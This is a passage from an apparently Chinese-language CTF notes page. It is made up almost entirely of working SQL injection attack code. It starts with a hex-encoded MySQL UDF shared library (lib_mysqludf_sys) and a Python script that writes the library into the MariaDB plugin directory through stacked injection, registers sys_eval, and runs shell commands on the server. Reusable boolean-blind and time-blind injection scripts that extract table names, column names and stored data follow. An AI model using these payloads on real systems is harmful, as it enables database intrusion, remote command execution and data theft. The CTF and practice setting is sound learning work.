010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400'
codes=[]
for i in range(0,len(code),128):
codes.append(code[i:min(i+128,len(code))])

#建临时表
#sql='''create table temp(data longblob)'''
#payload='''0';{};-- A'''.format(sql)
#requests.get(url+payload)

#清空临时表
sql='''delete from temp'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#插入第一段数据
sql='''insert into temp(data) values (0x{})'''.format(codes[0])
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#更新连接剩余数据
for k in range(1,len(codes)):
sql='''update temp set data = concat(data,0x{})'''.format(codes[k])
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#10.3.18-MariaDB
#写入so文件
sql='''select data from temp into dumpfile '/usr/lib/mariadb/plugin/udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#引入自定义函数
sql='''create function sys_eval returns string soname 'udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#命令执行,结果更新到界面
sql='''update ctfshow_user set pass=(select sys_eval('cat /flag.her?'))'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#查看结果
r=requests.get(url[:-4]+'?page=1&limit=10')
print(r.text)

NoSQL

常用脚本

  • 布尔盲注

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    import string
    import requests
    dic='{}-_'+string.digits+string.ascii_lowercase

    url='xxxxxxx'
    now=''
    for i in range(1,50):
    flag=0
    for j in dic:
    payload='''xxxxxxx'''.format()
    #print(payload)
    data={'username':payload,'password':'xxxxx'}
    r=requests.post(url,data=data)
    #print(r.text)
    if 'xxx' in r.text:
    now+=j
    print(now)
    flag=1
    break
    if flag==0:
    break
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    import requests

    url = "xxx"

    result = ''
    i = 0

    while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
    mid = (head + tail) >> 1
    # payload = f'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},1,0)'
    # payload = f'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},1,0)%23'
    payload = f'if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0)%23'
    data = {
    'id': f"100')||{payload}||('0"
    }
    r = requests.get(url,params=data)
    # r = requests.post(url,data=data)
    if "xxx" in r.text:
    head = mid + 1
    else:
    tail = mid

    if head != 32:
    result += chr(head)
    else:
    break
    print(result)

  • 时间盲注

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import requests
    import string
    import time

    dic='{}-_,'+string.ascii_lowercase+string.digits

    url='xxxxxx'
    now=''
    for i in range(1,50):
    flag=0
    for j in dic:
    a=time.time()
    payload='''xxxxxx'''.format()
    data={'ip':payload,"debug":0}
    r=requests.post(url,data=data)
    b=time.time()
    if b-a>1:
    now+=j
    flag=1
    print(now)
    break
    if flag==0:
    break
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    import requests

    url = "http://xxx/?id=1%22and%20"

    result = ''
    i = 0

    while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
    mid = (head + tail) >> 1
    # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="yyy")),{i},1))>{mid},sleep(0.6),0)%23'
    # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="yyy")),{i},1))>{mid},sleep(0.6),0)%23'
    payload = f'if(ascii(substr((select/**/group_concat(xxx)from(yyy.zzz)),{i},1))>{mid},sleep(0.6),0)%23'

    try:
    # data = {
    # 'uname':f"admin')and {payload}#",
    # 'passwd': '1'
    # }
    r = requests.get(url + payload,timeout=0.5)
    # r = requests.post(url, data=data, timeout=0.5)
    tail = mid
    except:
    head = mid + 1


    if head != 32:
    result += chr(head)
    else:
    break
    print(result)